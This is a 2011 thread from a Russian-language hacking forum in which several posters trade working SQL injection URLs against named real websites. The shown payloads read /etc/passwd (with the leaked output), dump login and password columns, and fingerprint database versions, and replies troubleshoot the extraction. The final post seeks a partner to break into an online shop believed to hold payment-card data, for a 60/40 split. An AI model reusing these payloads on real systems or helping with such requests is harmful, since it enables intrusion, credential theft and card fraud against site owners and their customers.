ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.06.2011, 01:10
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от FlaktW
FlaktW said:
Помогите определить БД, похоже на Postgres, но вывода не могу добиться
Код:
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version(),user(),database())+--+
4.1.20:root@localhost:Site2
Код:
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin
|
|
|
11.06.2011, 01:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
14219
Репутация:
0
|
|
Здравствуйте. Я не так давно решил заняться sql injectionom, так вот у меня созрели два вопроса. Я провел sql inject узнал, узнал названние таблиц, и нужной мне ячейки, делаю такой запрос
Код:
Code:
www.сайт.com/index.php?id=-15+union+select+1,2,3,concat_ws(login,0x3a,password),5,6+from+user+--+
Но логин и пароль на странице не поивился, и не выдала не какой ошибки, страница просто появилось. Version: 5.1.35.
Тоже самое я пробывал с другими таблицами, все было аналогично
Второй вопрос Дайте пожалуйста сылку на faq! Как провести sql injection в mysql v4.***** я на форуме не увидел не одной нормальной статьи для версии 4.***** я конечно уверен что они тут есть но найти не как не могу. Зараннее огромное спасибо. |
|
|
|
11.06.2011, 01:31
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"
Попробуй limit добавить.
2) SQL injection полный FAQ |
|
|
|
11.06.2011, 01:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
14219
Репутация:
0
|
|
Сообщение от M_script
M_script said:
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"
Попробуй limit добавить.
я вертел по всякому и с +limit+0,1 по разному пробывал! Но данные ячеек не появлялись! Может другие варианты есть?
этот фак я читал, и как я понил он ближе к 5-тым версиям mysql
|
|
|
|
11.06.2011, 01:41
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
может база не та
или unhex(hex())
|
|
|
|
11.06.2011, 01:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
14219
Репутация:
0
|
|
Сообщение от Seravin
Seravin said:
может база не та
или unhex(hex())
Можно по подробней? Точней пример запроса к бд
|
|
|
|
11.06.2011, 01:55
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от M_script
M_script said:
Код:
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version(),user(),database())+--+
4.1.20:root@localhost:Site2
Код:
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin Так вывод еще лучше:
Сообщение от None
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+load_fi le('/etc/passwd')+--+
|
|
|
|
11.06.2011, 02:02
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
3aHyga, кинь ссылку сюда или в личку
|
|
|
|
11.06.2011, 02:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
14219
Репутация:
0
|
|
Сообщение от M_script
M_script said:
3aHyga
, кинь ссылку сюда или в личку
Тут есть загвоздка! Я все делал на дедики и дедик в это время вырубился, я не знаю что там было может свет моргнул, или еще что данные сылки я утерял так как логи не сохранялись в мазиле а вспомнить не могу, а вобще это был какойто интернет магазин но не могу вспомнить сылку
вот могу еще один шоп дать там есть вывод на страницу и тд но не чего интересного там нету
_http://e-perfume.com.ar/verproducto.php?id=-180'
|
|
|
|
11.06.2011, 03:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
14219
Репутация:
0
|
|
Только что нашол интернет магазин! в катором я на 100% уверен хроняться даные о картах, так как покупка проходит имено через этот магазин все данные вбиваются в него, на другие сайты не кидает, но там есть какойто прикол! Допустим я делаю запрос
Код:
Code:
www.сайт.com/index.php?id=15+union+select+1,@@version,3,4,5,6+--+
то сайт показывает информацыю о версии sql // - 5.0.51a-3ubuntu5
если же я делаю любой другой запрос меня перегидывает на главную страницу. Так как я еще совсем новечек и не знаю всех прелестей sql injecta кто согласится мне помоч или сам проведет sql inject конечно все 50 на 50 я согласен даже что вам 60% а мне 40 так как всю работу будите делать вы то отпишите в асю я дам данные сайта
icq 144-558-923 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
